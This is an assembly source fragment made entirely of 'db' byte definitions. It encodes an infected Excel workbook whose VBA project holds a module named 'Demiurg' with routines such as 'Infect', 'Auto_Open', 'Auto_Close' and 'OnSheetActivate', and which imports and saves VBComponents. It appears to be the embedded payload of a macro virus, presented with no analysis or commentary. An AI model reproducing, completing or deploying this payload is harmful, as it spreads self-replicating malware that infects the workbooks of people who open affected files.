db 00Dh, 000h, 0E0h, 000h, 02Ah, 000h, 05Ch, 000h
db 047h, 000h, 07Bh, 000h, 036h, 000h, 032h, 000h
db 041h, 000h, 033h, 000h, 032h, 000h, 043h, 000h
db 036h, 000h, 032h, 000h, 02Dh, 000h, 041h, 000h
db 033h, 000h, 036h, 000h, 044h, 000h, 02Dh, 000h
db 031h, 000h, 031h, 000h, 044h, 000h, 033h, 000h
db 02Dh, 000h, 041h, 000h, 035h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 041h, 000h, 036h, 000h
db 046h, 000h, 033h, 000h, 044h, 000h, 044h, 000h
db 041h, 000h, 044h, 000h, 038h, 000h, 032h, 000h
db 033h, 000h, 039h, 000h, 07Dh, 000h, 023h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 023h, 000h
db 030h, 000h, 023h, 000h, 043h, 000h, 03Ah, 000h
db 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh, 000h
db 044h, 000h, 04Fh, 000h, 057h, 000h, 053h, 000h
db 05Ch, 000h, 053h, 000h, 059h, 000h, 053h, 000h
db 054h, 000h, 045h, 000h, 04Dh, 000h, 05Ch, 000h
db 04Dh, 000h, 053h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 02Eh, 000h
db 054h, 000h, 057h, 000h, 044h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 020h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Bh, 000h, 001h, 000h
db 0E4h, 000h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 036h, 000h, 032h, 000h, 041h, 000h
db 033h, 000h, 032h, 000h, 043h, 000h, 036h, 000h
db 033h, 000h, 02Dh, 000h, 041h, 000h, 033h, 000h
db 036h, 000h, 044h, 000h, 02Dh, 000h, 031h, 000h
db 031h, 000h, 044h, 000h, 033h, 000h, 02Dh, 000h
db 081h, 000h, 000h, 000h, 082h, 000h, 000h, 000h
db 083h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
db 085h, 000h, 000h, 000h, 086h, 000h, 000h, 000h
db 087h, 000h, 000h, 000h, 088h, 000h, 000h, 000h
db 089h, 000h, 000h, 000h, 08Ah, 000h, 000h, 000h
db 08Bh, 000h, 000h, 000h, 08Ch, 000h, 000h, 000h
db 08Dh, 000h, 000h, 000h, 08Eh, 000h, 000h, 000h
db 08Fh, 000h, 000h, 000h, 090h, 000h, 000h, 000h
db 091h, 000h, 000h, 000h, 092h, 000h, 000h, 000h
db 093h, 000h, 000h, 000h, 094h, 000h, 000h, 000h
db 095h, 000h, 000h, 000h, 096h, 000h, 000h, 000h
db 097h, 000h, 000h, 000h, 098h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 09Ah, 000h, 000h, 000h
db 09Bh, 000h, 000h, 000h, 09Ch, 000h, 000h, 000h
db 09Dh, 000h, 000h, 000h, 09Eh, 000h, 000h, 000h
db 09Fh, 000h, 000h, 000h, 0A0h, 000h, 000h, 000h
db 0A1h, 000h, 000h, 000h, 0A2h, 000h, 000h, 000h
db 0A3h, 000h, 000h, 000h, 0A4h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A6h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A8h, 000h, 000h, 000h
db 0A9h, 000h, 000h, 000h, 0AAh, 000h, 000h, 000h
db 0ABh, 000h, 000h, 000h, 0ACh, 000h, 000h, 000h
db 0ADh, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0AFh, 000h, 000h, 000h, 0B0h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0B2h, 000h, 000h, 000h
db 0B3h, 000h, 000h, 000h, 0B4h, 000h, 000h, 000h
db 0B5h, 000h, 000h, 000h, 0B6h, 000h, 000h, 000h
db 0B7h, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0B9h, 000h, 000h, 000h, 0FEh, 0E6h, 0FFh, 0FFh
db 0E6h, 01Ch, 0FFh, 041h, 000h, 035h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 041h, 000h, 036h
db 000h, 046h, 000h, 033h, 000h, 044h, 000h, 044h
db 000h, 041h, 000h, 044h, 000h, 038h, 000h, 032h
db 000h, 033h, 000h, 039h, 000h, 07Dh, 000h, 023h
db 000h, 032h, 000h, 02Eh, 000h, 030h, 000h, 023h
db 000h, 030h, 000h, 023h, 000h, 043h, 000h, 03Ah
db 000h, 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh
db 000h, 044h, 000h, 04Fh, 000h, 057h, 000h, 053h
db 000h, 05Ch, 000h, 054h, 000h, 045h, 000h, 04Dh
db 000h, 050h, 000h, 05Ch, 000h, 056h, 000h, 042h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 02Eh, 000h, 045h, 000h, 058h
db 000h, 044h, 000h, 023h, 000h, 04Dh, 000h, 069h
db 000h, 063h, 000h, 072h, 000h, 06Fh, 000h, 073h
db 000h, 06Fh, 000h, 066h, 000h, 074h, 000h, 020h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 020h, 000h, 032h, 000h, 02Eh
db 000h, 030h, 000h, 020h, 000h, 04Fh, 000h, 062h
db 000h, 06Ah, 000h, 065h, 000h, 063h, 000h, 074h
db 000h, 020h, 000h, 04Ch, 000h, 069h, 000h, 062h
db 000h, 072h, 000h, 061h, 000h, 072h, 000h, 079h
db 0E6h, 00Bh, 000h, 001h, 000h, 000h, 000h, 0E1h
db 02Eh, 045h, 00Dh, 08Fh, 0E0h, 01Ah, 010h, 085h
db 02Eh, 002h, 060h, 08Ch, 04Dh, 00Bh, 0B4h, 000h
db 000h, 004h, 001h, 02Ah, 000h, 05Ch, 000h, 047h
db 000h, 07Bh, 000h, 032h, 000h, 044h, 000h, 046h
db 000h, 038h, 000h, 044h, 000h, 030h, 000h, 034h
db 000h, 043h, 000h, 02Dh, 000h, 035h, 000h, 042h
db 000h, 046h, 000h, 041h, 000h, 02Dh, 000h, 031h
db 000h, 030h, 000h, 031h, 000h, 042h, 000h, 02Dh
db 000h, 042h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 041h
db 000h, 041h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 034h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 032h, 000h, 07Dh, 000h, 023h, 000h, 032h
db 000h, 02Eh, 000h, 030h, 000h, 023h, 000h, 030h
db 000h, 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch
db 000h, 050h, 000h, 052h, 000h, 04Fh, 000h, 047h
db 000h, 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 049h
db 000h, 043h, 000h, 052h, 000h, 04Fh, 000h, 053h
db 000h, 04Fh, 000h, 046h, 000h, 054h, 000h, 020h
db 000h, 04Fh, 000h, 046h, 000h, 046h, 000h, 049h
db 000h, 043h, 000h, 045h, 000h, 05Ch, 000h, 04Fh
db 000h, 046h, 000h, 046h, 000h, 049h, 000h, 043h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 04Fh, 000h, 039h, 000h, 037h, 000h, 02Eh
db 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h, 023h
db 000h, 04Dh, 000h, 069h, 000h, 063h, 000h, 072h
db 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h
db 000h, 074h, 000h, 020h, 000h, 04Fh, 000h, 066h
db 000h, 066h, 000h, 069h, 000h, 063h, 000h, 065h
db 000h, 020h, 000h, 038h, 000h, 02Eh, 000h, 030h
db 000h, 020h, 000h, 04Fh, 000h, 062h, 000h, 06Ah
db 000h, 065h, 000h, 063h, 000h, 074h, 000h, 020h
db 000h, 04Ch, 000h, 069h, 000h, 062h, 000h, 072h
db 000h, 061h, 000h, 072h, 000h, 079h, 0E6h, 00Dh
db 000h, 003h, 000h, 002h, 000h, 002h, 000h, 001h
db 000h, 003h, 000h, 004h, 002h, 000h, 000h, 006h
db 002h, 001h, 000h, 008h, 002h, 000h, 000h, 010h
db 002h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh
db 0FFh, 000h, 000h, 0E8h, 005h, 0C0h, 038h, 003h
db 000h, 0E6h, 00Ah, 0FFh, 000h, 000h, 001h, 000h
db 0E6h, 026h, 0FFh, 002h, 000h, 0E6h, 00Ah, 0FFh
db 001h, 0E6h, 013h, 000h, 0B5h, 031h, 003h, 000h
db 022h, 000h, 044h, 000h, 069h, 000h, 065h, 000h
db 073h, 000h, 065h, 000h, 041h, 000h, 072h, 000h
db 062h, 000h, 065h, 000h, 069h, 000h, 074h, 000h
db 073h, 000h, 06Dh, 000h, 061h, 000h, 070h, 000h
db 070h, 000h, 065h, 000h, 00Ah, 000h, 034h, 033h
db 038h, 063h, 030h, 030h, 035h, 065h, 038h, 000h
db 003h, 000h, 02Ah, 044h, 001h, 015h, 002h, 0FFh
db 0FFh, 0B7h, 031h, 0E6h, 007h, 000h, 002h, 000h
db 000h, 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh
db 010h, 000h, 054h, 000h, 061h, 000h, 062h, 000h
db 065h, 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h
db 031h, 000h, 00Ah, 000h, 035h, 033h, 038h, 063h
db 030h, 030h, 035h, 065h, 038h, 000h, 003h, 000h
db 02Ah, 044h, 001h, 019h, 002h, 0FFh, 0FFh, 0B9h
db 031h, 0E6h, 006h, 000h, 018h, 002h, 000h, 000h
db 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh, 00Eh
db 000h, 044h, 000h, 065h, 000h, 06Dh, 000h, 069h
db 000h, 075h, 000h, 072h, 000h, 067h, 000h, 00Ah
db 000h, 064h, 033h, 038h, 063h, 030h, 030h, 035h
db 066h, 036h, 000h, 003h, 000h, 02Ah, 044h, 001h
db 01Ch, 002h, 0FFh, 0FFh, 0BBh, 031h, 0E6h, 006h
db 000h, 030h, 002h, 000h, 000h, 000h, 0B7h, 005h
db 000h, 000h, 0E6h, 006h, 0FFh, 001h, 001h, 050h
db 002h, 000h, 000h, 0E6h, 0D8h, 0FFh, 000h, 002h
db 000h, 000h, 0E6h, 004h, 0FFh, 018h, 002h, 000h
db 000h, 0E6h, 004h, 0FFh, 030h, 002h, 000h, 000h
db 0E6h, 0FFh, 0FFh, 0E6h, 015h, 0FFh, 0E7h, 06Eh
db 0E4h, 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h
db 0A6h, 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h
db 0FFh, 001h, 000h, 000h, 000h, 0E9h, 06Eh, 0E4h
db 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h
db 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh
db 001h, 000h, 000h, 000h, 0EBh, 06Eh, 0E4h, 0D9h
db 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h, 0F3h
db 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh, 001h
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 030h, 000h
db 000h, 000h, 080h, 0E6h, 005h, 000h, 020h, 001h
db 021h, 000h, 0FFh, 000h, 0B8h, 028h, 000h, 000h
db 005h, 004h, 045h, 078h, 063h, 065h, 06Ch, 080h
db 02Bh, 010h, 000h, 003h, 004h, 056h, 042h, 041h
db 0F7h, 0E2h, 010h, 000h, 005h, 004h, 057h, 069h
db 06Eh, 031h, 036h, 0C1h, 07Eh, 010h, 000h, 005h
db 004h, 057h, 069h, 06Eh, 033h, 032h, 007h, 07Fh
db 010h, 000h, 003h, 004h, 04Dh, 061h, 063h, 0B3h
db 0B2h, 010h, 000h, 008h, 004h, 050h, 072h, 06Fh
db 06Ah, 065h, 06Bh, 074h, 031h, 0D2h, 041h, 010h
db 000h, 006h, 004h, 073h, 074h, 064h, 06Fh, 06Ch
db 065h, 093h, 060h, 010h, 000h, 007h, 000h, 04Dh
db 053h, 046h, 06Fh, 072h, 06Dh, 073h, 043h, 00Fh
db 010h, 000h, 00Ah, 004h, 056h, 042h, 041h, 050h
db 072h, 06Fh, 06Ah, 065h, 063h, 074h, 0BEh, 0BFh
db 010h, 000h, 006h, 004h, 04Fh, 066h, 066h, 069h
db 063h, 065h, 015h, 075h, 010h, 000h, 011h, 004h
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
db 065h, 0AFh, 081h, 010h, 000h, 009h, 080h, 000h
db 000h, 0FFh, 003h, 001h, 000h, 05Fh, 045h, 076h
db 061h, 06Ch, 075h, 061h, 074h, 065h, 018h, 0D9h
db 010h, 000h, 008h, 004h, 054h, 061h, 062h, 065h
db 06Ch, 06Ch, 065h, 031h, 052h, 08Ah, 010h, 000h
db 006h, 004h, 04Dh, 06Fh, 064h, 075h, 06Ch, 031h
db 0CDh, 01Eh, 010h, 000h, 007h, 004h, 044h, 065h
db 06Dh, 069h, 075h, 072h, 067h, 01Dh, 017h, 010h
db 000h, 009h, 004h, 041h, 075h, 074h, 06Fh, 05Fh
db 04Fh, 070h, 065h, 06Eh, 056h, 020h, 010h, 000h
db 00Bh, 000h, 041h, 070h, 070h, 06Ch, 069h, 063h
db 061h, 074h, 069h, 06Fh, 06Eh, 0A5h, 02Ah, 010h
db 000h, 00Fh, 000h, 04Fh, 06Eh, 053h, 068h, 065h
db 065h, 074h, 041h, 063h, 074h, 069h, 076h, 061h
db 074h, 065h, 0FAh, 06Eh, 010h, 000h, 00Ah, 004h
db 041h, 075h, 074h, 06Fh, 05Fh, 043h, 06Ch, 06Fh
db 073h, 065h, 077h, 080h, 010h, 000h, 00Ch, 000h
db 041h, 063h, 074h, 069h, 076h, 065h, 057h, 069h
db 06Eh, 064h, 06Fh, 077h, 0C3h, 02Bh, 010h, 000h
db 007h, 000h, 056h, 069h, 073h, 069h, 062h, 06Ch
db 065h, 0B6h, 0D3h, 010h, 000h, 006h, 004h, 049h
db 06Eh, 066h, 065h, 063h, 074h, 0E8h, 066h, 010h
db 000h, 00Dh, 000h, 044h, 069h, 073h, 070h, 06Ch
db 061h, 079h, 041h, 06Ch, 065h, 072h, 074h, 073h
db 0F4h, 0F6h, 010h, 000h, 008h, 000h, 06Ch, 061h
db 073h, 074h, 063h, 068h, 061h, 072h, 013h, 09Ah
db 010h, 000h, 003h, 000h, 041h, 073h, 063h, 021h
db 075h, 010h, 000h, 00Eh, 000h, 041h, 063h, 074h
db 069h, 076h, 065h, 057h, 06Fh, 072h, 06Bh, 062h
db 06Fh, 06Fh, 06Bh, 013h, 0A2h, 010h, 000h, 001h
db 000h, 069h, 060h, 010h, 010h, 000h, 009h, 000h
db 056h, 042h, 050h, 072h, 06Fh, 06Ah, 065h, 063h
db 074h, 04Fh, 068h, 010h, 000h, 00Ch, 000h, 056h
db 042h, 043h, 06Fh, 06Dh, 070h, 06Fh, 06Eh, 065h
db 06Eh, 074h, 073h, 00Ah, 027h, 010h, 000h, 005h
db 000h, 063h, 06Fh, 075h, 06Eh, 074h, 030h, 076h
db 010h, 000h, 006h, 000h, 049h, 06Dh, 070h, 06Fh
db 072h, 074h, 069h, 0C5h, 010h, 000h, 004h, 000h
db 053h, 061h, 076h, 065h, 092h, 0D0h, 010h, 000h
db 008h, 004h, 057h, 06Fh, 072h, 06Bh, 062h, 06Fh
db 06Fh, 06Bh, 06Bh, 018h, 010h, 000h, 002h, 0FFh
db 0FFh, 001h, 001h, 06Ch, 000h, 000h, 000h, 01Dh
db 002h, 002h, 000h, 010h, 000h, 0E6h, 012h, 0FFh
db 000h, 002h, 001h, 000h, 0FFh, 0FFh, 002h, 002h
db 000h, 000h, 0E6h, 01Ah, 0FFh, 00Ch, 002h, 002h
db 000h, 0FFh, 0FFh, 00Eh, 002h, 003h, 000h, 0FFh
db 0FFh, 010h, 002h, 0E6h, 004h, 0FFh, 012h, 002h
db 004h, 000h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
db 00Eh, 000h, 0E6h, 006h, 0FFh, 019h, 002h, 001h
db 000h, 00Eh, 000h, 0E6h, 006h, 0FFh, 000h, 000h
db 012h, 000h, 000h, 000h, 001h, 000h, 036h, 0E6h
db 060h, 000h, 001h, 0C6h, 0B2h, 080h, 001h, 000h
db 004h, 000h, 000h, 000h, 001h, 000h, 030h, 02Ah
db 002h, 002h, 090h, 009h, 000h, 070h, 014h, 006h
db 048h, 003h, 000h, 082h, 002h, 000h, 064h, 0E4h
db 004h, 004h, 000h, 00Ah, 000h, 01Ch, 000h, 056h
db 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h, 088h
db 063h, 074h, 005h, 000h, 034h, 000h, 000h, 040h
db 002h, 014h, 06Ah, 006h, 002h, 00Ah, 03Dh, 002h
db 00Ah, 007h, 002h, 072h, 001h, 014h, 008h, 005h
db 006h, 012h, 009h, 002h, 012h, 0E8h, 005h, 0C0h
db 038h, 003h, 094h, 000h, 00Ch, 002h, 04Ah, 03Ch
db 002h, 00Ah, 016h, 000h, 001h, 072h, 080h, 073h
db 074h, 064h, 06Fh, 06Ch, 065h, 03Eh, 002h, 019h
db 000h, 073h, 000h, 074h, 000h, 064h, 000h, 06Fh
db 000h, 080h, 06Ch, 000h, 065h, 000h, 00Dh, 000h
db 066h, 000h, 025h, 002h, 05Ch, 000h, 003h, 02Ah
db 05Ch, 047h, 07Bh, 030h, 030h, 080h, 030h, 032h
db 030h, 034h, 033h, 030h, 02Dh, 000h, 008h, 01Dh
db 004h, 004h, 043h, 000h, 00Ah, 002h, 00Eh, 001h
db 012h, 030h, 030h, 034h, 000h, 036h, 07Dh, 023h
db 032h, 02Eh, 030h, 023h, 030h, 000h, 023h, 043h
db 03Ah, 05Ch, 057h, 049h, 04Eh, 044h, 000h, 04Fh
db 057h, 053h, 05Ch, 053h, 059h, 053h, 054h, 000h
db 045h, 04Dh, 05Ch, 053h, 054h, 044h, 04Fh, 04Ch
db 080h, 045h, 032h, 02Eh, 054h, 04Ch, 042h, 023h
db 000h, 008h, 000h, 020h, 041h, 075h, 074h, 06Fh
db 06Dh, 061h, 074h, 018h, 069h, 06Fh, 06Eh, 000h
db 05Eh, 000h, 001h, 016h, 000h, 007h, 001h, 080h
db 002h, 04Dh, 053h, 046h, 06Fh, 072h, 06Dh, 073h
db 008h, 03Eh, 000h, 00Eh, 001h, 006h, 000h, 053h
db 000h, 046h, 001h, 000h, 045h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 02Fh, 034h, 000h, 07Ah, 080h
db 009h, 070h, 080h, 001h, 001h, 046h, 036h, 032h
db 000h, 041h, 033h, 032h, 043h, 036h, 032h, 02Dh
db 041h, 000h, 033h, 036h, 044h, 02Dh, 031h, 031h
db 044h, 033h, 000h, 02Dh, 041h, 035h, 030h, 030h
db 02Dh, 041h, 036h, 000h, 046h, 033h, 044h, 044h
db 041h, 044h, 038h, 032h, 00Ch, 033h, 039h, 017h
db 046h, 004h, 033h, 02Eh, 054h, 057h, 044h, 000h
db 023h, 04Dh, 069h, 063h, 072h, 06Fh, 073h, 06Fh
db 028h, 066h, 074h, 020h, 002h, 03Dh, 020h, 000h
db 060h, 020h, 04Fh, 002h, 062h, 001h, 0B0h, 020h
db 04Ch, 069h, 062h, 072h, 061h, 01Ch, 072h, 079h
db 000h, 039h, 000h, 001h, 01Eh, 050h, 030h, 000h
db 090h, 07Dh, 000h, 013h, 072h, 080h, 001h, 008h
db 050h, 000h, 04Bh, 02Ah, 050h, 080h, 04Ah, 050h
db 020h, 05Ch, 056h, 042h, 045h, 05Ch, 085h, 028h
db 045h, 058h, 001h, 0A7h, 028h, 0E1h, 02Eh, 045h
db 00Dh, 08Fh, 0E0h, 01Ah, 000h, 010h, 085h, 02Eh
db 002h, 060h, 08Ch, 04Dh, 00Bh, 006h, 0B4h, 041h
db 094h, 043h, 078h, 04Fh, 066h, 066h, 069h, 063h
db 005h, 044h, 078h, 04Fh, 040h, 075h, 066h, 000h
db 069h, 000h, 063h, 015h, 042h, 078h, 08Ch, 0C0h
db 02Bh, 082h, 0C4h, 02Ch, 032h, 044h, 046h, 000h
db 038h, 044h, 030h, 034h, 043h, 02Dh, 035h, 042h
db 000h, 046h, 041h, 02Dh, 031h, 030h, 031h, 042h
db 02Dh, 090h, 064h, 000h, 069h, 000h, 072h, 0E6h
db 03Bh, 000h, 008h, 000h, 002h, 000h, 0E6h, 00Ch
db 0FFh, 0E6h, 024h, 000h, 099h, 000h, 000h, 000h
db 0CAh, 002h, 0E6h, 006h, 000h, 050h, 000h, 052h
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
db 000h, 054h, 000h, 077h, 000h, 06Dh, 0E6h, 02Fh
db 000h, 014h, 000h, 002h, 000h, 0E6h, 00Ch, 0FFh
db 0E6h, 024h, 000h, 0A5h, 000h, 000h, 000h, 06Bh
db 0E6h, 007h, 000h, 050h, 000h, 052h, 000h, 04Fh
db 000h, 04Ah, 000h, 045h, 000h, 043h, 000h, 054h
db 0E6h, 033h, 000h, 010h, 000h, 002h, 001h, 003h
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 024h, 000h, 0A7h, 000h, 000h
db 000h, 0B8h, 001h, 0E6h, 006h, 000h, 005h, 000h
db 053h, 000h, 075h, 000h, 06Dh, 000h, 06Dh, 000h
db 061h, 000h, 072h, 000h, 079h, 000h, 049h, 000h
db 06Eh, 000h, 066h, 000h, 06Fh, 000h, 072h, 000h
db 06Dh, 000h, 061h, 000h, 074h, 000h, 069h, 000h
db 06Fh, 000h, 06Eh, 0E6h, 01Bh, 000h, 028h, 000h
db 002h, 001h, 0E6h, 004h, 0FFh, 00Ch, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 024h, 000h, 0AEh
db 000h, 000h, 000h, 0B4h, 0E6h, 007h, 000h, 042h
db 044h, 045h, 035h, 040h, 078h, 041h, 041h, 040h
db 077h, 00Ah, 034h, 0C0h, 002h, 032h, 008h, 055h
db 050h, 052h, 04Fh, 047h, 010h, 052h, 041h, 04Dh
db 04Dh, 000h, 02Bh, 049h, 043h, 052h, 000h, 04Fh
db 053h, 04Fh, 046h, 054h, 020h, 04Fh, 046h, 020h
db 046h, 049h, 043h, 045h, 05Ch, 084h, 001h, 04Dh
db 053h, 080h, 04Fh, 039h, 037h, 02Eh, 044h, 04Ch
db 04Ch, 048h, 059h, 0A1h, 083h, 022h, 020h, 038h
db 02Eh, 030h, 092h, 059h, 00Fh, 042h, 0BBh, 008h
db 003h, 000h, 013h, 0C2h, 001h, 0B5h, 031h, 019h
db 000h, 002h, 011h, 040h, 027h, 044h, 069h, 065h
db 073h, 065h, 041h, 000h, 072h, 062h, 065h, 069h
db 074h, 073h, 06Dh, 061h, 010h, 070h, 070h, 065h
db 01Ah, 093h, 005h, 032h, 000h, 022h, 00Bh, 041h
db 00Bh, 040h, 037h, 065h, 080h, 08Ch, 065h, 000h
db 041h, 000h, 0A8h, 072h, 000h, 062h, 0C0h, 039h
db 069h, 040h, 0B5h, 073h, 080h, 091h, 088h, 061h
db 000h, 070h, 040h, 000h, 065h, 000h, 01Ch, 040h
db 009h, 028h, 000h, 000h, 048h, 042h, 001h, 031h
db 0C2h, 0C6h, 01Fh, 003h, 058h, 000h, 000h, 01Eh
db 042h, 002h, 001h, 005h, 02Ch, 042h, 01Fh, 0B7h
db 022h, 031h, 041h, 013h, 000h, 000h, 02Bh, 0C2h
db 009h, 019h, 000h, 002h, 008h, 0C0h, 001h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 088h, 065h, 031h
db 01Ah, 04Ah, 003h, 032h, 000h, 010h, 0C1h, 006h
db 054h, 000h, 061h, 042h, 01Bh, 06Ch, 042h, 0CFh
db 031h, 064h, 019h, 0B9h, 005h, 04Ch, 019h, 007h
db 020h, 009h, 044h, 065h, 06Dh, 069h, 075h, 058h
db 072h, 067h, 01Ah, 082h, 062h, 084h, 001h, 032h
db 082h, 062h, 044h, 055h, 0A0h, 019h, 06Dh, 0E0h
db 01Bh, 075h, 020h, 01Bh, 067h, 030h, 00Ch, 0B7h
db 0E3h, 0C0h, 082h, 0EDh, 018h, 0BBh, 031h, 021h
db 060h, 00Ah, 0E5h, 018h, 021h, 015h, 0E6h, 039h
db 000h, 044h, 069h, 065h, 073h, 065h, 041h, 072h
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
db 070h, 065h, 000h, 044h, 000h, 069h, 000h, 065h
db 000h, 073h, 000h, 065h, 000h, 041h, 000h, 072h
db 000h, 062h, 000h, 065h, 000h, 069h, 000h, 074h
db 000h, 073h, 000h, 06Dh, 000h, 061h, 000h, 070h
db 000h, 070h, 000h, 065h, 000h, 000h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 000h
db 054h, 000h, 061h, 000h, 062h, 000h, 065h, 000h
db 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h, 000h
db 000h, 000h, 044h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 000h, 044h, 000h, 065h, 000h, 06Dh, 000h
db 069h, 000h, 075h, 000h, 072h, 000h, 067h, 0E6h
db 01Ah, 000h, 049h, 044h, 03Dh, 022h, 07Bh, 044h
db 039h, 045h, 034h, 036h, 045h, 046h, 030h, 02Dh
db 046h, 031h, 033h, 041h, 02Dh, 031h, 031h, 044h
db 033h, 02Dh, 041h, 035h, 030h, 031h, 02Dh, 041h
db 036h, 046h, 033h, 044h, 044h, 041h, 044h, 038h
db 032h, 033h, 039h, 07Dh, 022h, 00Dh, 00Ah, 044h
db 06Fh, 063h, 075h, 06Dh, 065h, 06Eh, 074h, 03Dh
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
db 065h, 02Fh, 026h, 048h, 0E6h, 008h, 030h, 00Dh
db 00Ah, 044h, 06Fh, 063h, 075h, 06Dh, 065h, 06Eh
db 074h, 03Dh, 054h, 061h, 062h, 065h, 06Ch, 06Ch
db 065h, 031h, 02Fh, 026h, 048h, 0E6h, 008h, 030h
db 00Dh, 00Ah, 04Dh, 06Fh, 064h, 075h, 06Ch, 065h
db 03Dh, 044h, 065h, 06Dh, 069h, 075h, 072h, 067h
db 00Dh, 00Ah, 04Eh, 061h, 06Dh, 065h, 03Dh, 022h
db 056h, 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h
db 063h, 074h, 022h, 00Dh, 00Ah, 048h, 065h, 06Ch
db 070h, 043h, 06Fh, 06Eh, 074h, 065h, 078h, 074h
db 049h, 044h, 03Dh, 022h, 030h, 022h, 00Dh, 00Ah
db 043h, 04Dh, 047h, 03Dh, 022h, 039h, 039h, 039h
db 042h, 039h, 038h, 039h, 038h, 039h, 043h, 039h
db 038h, 039h, 043h, 039h, 038h, 039h, 043h, 039h
db 038h, 039h, 043h, 022h, 00Dh, 00Ah, 044h, 050h
db 042h, 03Dh, 022h, 033h, 032h, 033h, 030h, 033h
db 033h, 041h, 038h, 043h, 044h, 041h, 039h, 043h
db 044h, 041h, 039h, 043h, 044h, 022h, 00Dh, 00Ah
db 047h, 043h, 03Dh, 022h, 043h, 042h, 043h, 039h
db 043h, 041h, 035h, 033h, 036h, 032h, 035h, 034h
db 036h, 032h, 035h, 034h, 039h, 044h, 022h, 00Dh
db 00Ah, 00Dh, 00Ah, 05Bh, 048h, 06Fh, 073h, 074h
db 020h, 045h, 078h, 074h, 065h, 06Eh, 064h, 065h
db 072h, 020h, 049h, 06Eh, 066h, 06Fh, 05Dh, 00Dh
db 00Ah, 026h, 048h, 0E6h, 007h, 030h, 031h, 03Dh
db 07Bh, 033h, 038h, 033h, 032h, 044h, 036h, 034h
db 030h, 02Dh, 043h, 046h, 039h, 030h, 02Dh, 031h
db 031h, 043h, 046h, 02Dh, 038h, 045h, 034h, 033h
db 02Dh, 030h, 030h, 041h, 030h, 043h, 039h, 031h
db 031h, 030h, 030h, 035h, 041h, 07Dh, 03Bh, 056h
db 042h, 045h, 03Bh, 026h, 048h, 0E6h, 008h, 030h
db 00Dh, 00Ah, 00Dh, 00Ah, 05Bh, 057h, 06Fh, 072h
db 06Bh, 073h, 070h, 061h, 063h, 065h, 05Dh, 00Dh
db 00Ah, 044h, 069h, 065h, 073h, 065h, 041h, 072h
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
db 070h, 065h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
db 00Dh, 00Ah, 054h, 061h, 062h, 065h, 06Ch, 06Ch
db 065h, 031h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
